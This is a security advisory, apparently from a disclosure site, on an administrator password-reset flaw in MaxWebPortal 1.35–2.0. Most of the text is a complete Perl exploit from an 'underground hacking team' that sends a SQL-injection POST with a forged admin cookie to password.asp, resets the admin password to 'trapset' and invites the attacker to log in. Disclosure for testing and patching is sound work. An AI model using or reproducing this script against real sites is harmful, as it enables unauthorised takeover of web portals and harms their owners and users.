MaxWebPortal Administrator Password Retrieval (Exploit)Summary
MaxWebPortal is "a web portal and online community system which includes advanced features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. Easy-to-use and powerful user interface allows members to add news, content, write reviews and share information among other registered users".
A vulnerability in MaxWebPortal allows remote attackers to retrieve the password utilized by the administrator user. The following exploit can be used to test your system for the mentioned vulnerability.
Credit:
The information has been provided by s d.
Details
Vulnerable Systems:
* MaxWebPortal version 1.35
* MaxWebPortal version 1.36
* MaxWebPortal version 2.0
Exploit:
#!/usr/bin/perl
#################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
#################################
# EXPLOIT FOR - MAX Portal (All Versions)
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v );
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#
#Discovered by: s d <irsdl@yahoo.com>
#
#################################
# Gr33tz To => mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
#And Iranian Hacking & Security Teams :
# IHS , Shabgard , Emperor ,Crouz & Simorgh-ev
#################################
use IO::Socket;
if (@ARGV < 2)
{
print "\n=====================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set Underground Hacking Team \n\n";
print " Usage: Max.pl <T4rg3t> <V3rsion>\n\n";
print " V3rsion :\n";
print " 1 => Version 1.35 and 0lder\n";
print " 2 => Version 1.36, 2.0 and Next\n";
print "=====================\n\n";
print "Example:\n\n";
print " Max.pl www.Site.com 1\n";
exit();
}
$hell = "foo' or M_Name='admin";
if ($ARGV[1] =~"2" ){$hell = "foo%27%29+or+M_Name%3D%27admin%27". "+or+%28%271%27%3D%272"};
my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "C0nn3cted\n";
$http = "POST /password.asp?mode=reset HTTP/1.0";
$http .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
$http .= "Accept-Language: fa\n";
$http .= "Content-Type: application/x-www-form-urlencoded\n";
$http .= "Pragma: no-cache\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n";
$http .= "Content-Length: 111\n";
$http .= "Proxy-Connection: Keep-Alive\n";
$http .= "Cookie: SSOComhide=Name=admin; SSOComUser=Cookies=&Pword=d7fae5da3d785535c12b70865519ba86". "&Name=admin\n\n";
$http .= "pass=trapset&pass2=trapset&memId=-1&memKey=$hell". "&Submit=Submit\n\n\n\n";
print "\n";
print $remote $http;
sleep(1);
print "[+] Attacking ...\n";
print "[+] Changing Admin's Password ...\n";
while (<$remote>)
{
}
print "\nNow Go to $host and Login With :\n\n";
print "User: admin\n";
print "Pass: trapset\n\n";
print "Enjoy ;)\n";
print "\n";
## EOF ##
推荐
评论(0条)
